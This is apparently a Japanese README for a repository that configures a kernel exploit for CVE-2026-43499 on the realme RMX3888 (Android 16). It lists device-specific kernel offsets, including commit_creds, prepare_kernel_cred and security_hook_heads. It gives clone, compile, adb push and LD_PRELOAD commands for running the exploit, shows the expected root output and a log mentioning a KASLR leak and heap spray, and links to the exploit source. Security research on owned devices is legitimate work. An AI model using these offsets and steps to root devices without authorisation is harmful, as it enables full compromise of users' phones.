
rmx3888-cve-2026-43499-config v0.2.0
CVE-2026-43499 の realme RMX3888(Android 16)向けエクスプロイト設定 - 検証済みカーネルオフセット20件
CVE-2026-43499 realme RMX3888 向けエクスプロイト設定
デバイス情報
- ブランド/モデル: realme RMX3888
- Android バージョン: 16 (SDK 36)
- ビルド ID: BP2A.250605.015
- カーネル: Linux 6.1.141-android14-11-o-gffc54a6d2287
- SoC: Qualcomm SM8650 (Snapdragon 8 Gen 3)
- アーキテクチャ: ARM64 (aarch64)
概要
このリポジトリには、realme RMX3888 デバイスを対象とした CVE-2026-43499 (GhostLock) エクスプロイトの完全な設定ファイルが含まれています。すべてのカーネルオフセットは、デバイスの boot.img から抽出され、検証済みです。
特徴
✓ 検証済みカーネルオフセット20個 vmlinux から抽出 ✓ リアルタイムロギング O_SYNC + fsync によるカーネルパニック時の安全性 ✓ RMX3888 向けのデバイス固有設定 ✓ NDK 自動検出付きワンクリックコンパイルスクリプト ✓ ビルドガイド付きの包括的ドキュメント
含まれるファイル
設定ファイル
- target.h - デバイス固有のカーネルオフセット (検証済み20個)
- common.h - ロギング統合を含むビルド設定
- realtime_log.h - リアルタイムロギングの実装
ドキュメント
- BUILD_GUIDE.md - 完全なコンパイルガイド
- report.md - 詳細な分析レポート (ラウンド1)
- round2_report.md - 設定レポート (ラウンド2)
- ROUND2_STATUS.md - 実行ステータスの概要
- compile_status.json - 機械可読なビルドステータス
スクリプト
- compile_rmx3888.sh - ワンクリックコンパイルスクリプト
クイックスタート
前提条件
- Android NDK r26d 以降
- Git Bash、Linux/WSL、または Termux 環境
コンパイル
git clone https://github.com/Bailan766/rmx3888-cve-2026-43499-config.git
cd rmx3888-cve-2026-43499-config
export ANDROID_NDK_HOME=/path/to/android-ndk
chmod +x compile_rmx3888.sh
./compile_rmx3888.sh
Windows の Git Bash では、スクリプトは Android Studio とコマンドラインツールで使用されるデフォルトの SDK パスを自動検出します: /c/Android/Sdk/ndk/*。
注: ASHMEM_MISC_FOPS、ASHMEM_COMPAT_IOCTL、および COPY_SPLICE_READ は現在、RMX3888 ターゲットヘッダーでビルド互換のフォールバックを使用しています。ランタイム動作に依存する前に、検証済みの RMX3888 vmlinux オフセットに置き換えてください。
使用方法
# Push to device
adb push build/rmx3888-BP2A.250605.015/bin/preload.so /data/local/tmp/
# Set permissions
adb shell chmod 755 /data/local/tmp/preload.so
# Execute exploit
adb shell LD_PRELOAD=/data/local/tmp/preload.so id
# Check logs
adb shell cat /sdcard/Download/log_*.txt
主要オフセット
以下の主要オフセットはカーネル 6.1.141 から抽出されたものです。RMX3888 固有の検証がまだ必要なビルド互換フォールバックエントリについては、上記の注を参照してください。
#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define INIT_TASK_OFF 0x0202fc00ULL
#define SECURITY_HOOK_HEADS_OFF 0x015c1488ULL
#define ASHMEM_FOPS_OFF 0x0126bbe0ULL
#define COMMIT_CREDS 0xffffffc0081e9b60 (offset: 0x001e9b60)
#define PREPARE_KERNEL_CRED 0xffffffc0081e9df0 (offset: 0x001e9df0)
// ... 15 more verified offsets
ロギング機能
統合されたリアルタイムロギングモジュールは以下を提供します:
- プライマリログパス: /sdcard/Download/log_.txt
- フォールバックパス: /data/local/tmp/log_.txt
- カーネルパニック安全性: O_SYNC + fsync() による即時ディスク書き込み
- タイムスタンプ付きエントリ: すべてのログエントリに正確なタイムスタンプが含まれます
- stderr ミラー: adb logcat 用にログを stderr にも出力します
期待される結果
エクスプロイト成功時
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),...
ログファイル出力
` === CVE-2026-43499 Exploit Log Started === Time: 2026-07-23 18:00:00 PID: 12345 UID: 2000 Log Path: /sdcard/Download/log_20260723_180000.txt
[18:00:01] [] Starting exploit... [18:00:02] [+] Kernel base leaked: 0xffffffc008000000 [18:00:03] [] Preparing heap spray... ... `
トラブルシューティング
詳細なトラブルシューティング手順については、BUILD_GUIDE.md を参照してください。手順には以下が含まれます:
- コンパイルエラー
- ランタイムクラッシュ
- KASLR バイパスの問題
- SELinux ポリシーによるブロック
セキュリティに関する注意
⚠️ 警告: この設定は、許可されたセキュリティ研究のみを目的としています。
- 自分が所有するデバイスでのみ使用してください
- 許可なくコンパイル済みバイナリを配布しないでください
- 責任ある開示の慣行を尊重してください
- ログファイルには機密性の高いシステム情報が含まれる場合があります
技術詳細
抽出プロセス
- Android Boot Image v4 パーサーを使用して boot.img を展開
- vmlinux-to-elf を使用して vmlinux を抽出 (102,871 シンボル)
- 99,580 個の有効なシンボルを解析および分析
- 20 個の重要オフセットを相互検証
- シンボルアドレスの整合性チェックによるオフセット検証
オフセット検証
- カーネルベースアドレスを確認: 0xffffffc008000000
- すべてのシンボルアドレスがメモリレイアウトに対して検証済み
- 参照デバイス (Google Pixel tokay) と相互参照済み
- 100% の抽出成功率 (20/20 オフセット)
参照
- CVE-2026-43499: GhostLock - Ion アロケーターの UAF 脆弱性
- エクスプロイトソース: https://github.com/NebuSec/CyberMeowfia
- 対象デバイス: realme RMX3888 (Snapdragon 8 Gen 3)
ライセンス
この設定は、教育およびセキュリティ研究目的のみで提供されます。
免責事項
このリポジトリにはセキュリティ研究資料が含まれています。著者および貢献者は、このコードによって引き起こされた誤用や損害について一切の責任を負いません。自己責任で使用し、自分が所有するデバイス、または明示的なテスト許可を得たデバイスでのみ使用してください。
生成日: 2026-07-23
カーネルバージョン: 6.1.141-android14-11-o-gffc54a6d2287
オフセット検証: 100% (20/20)
ステータス: コンパイル準備完了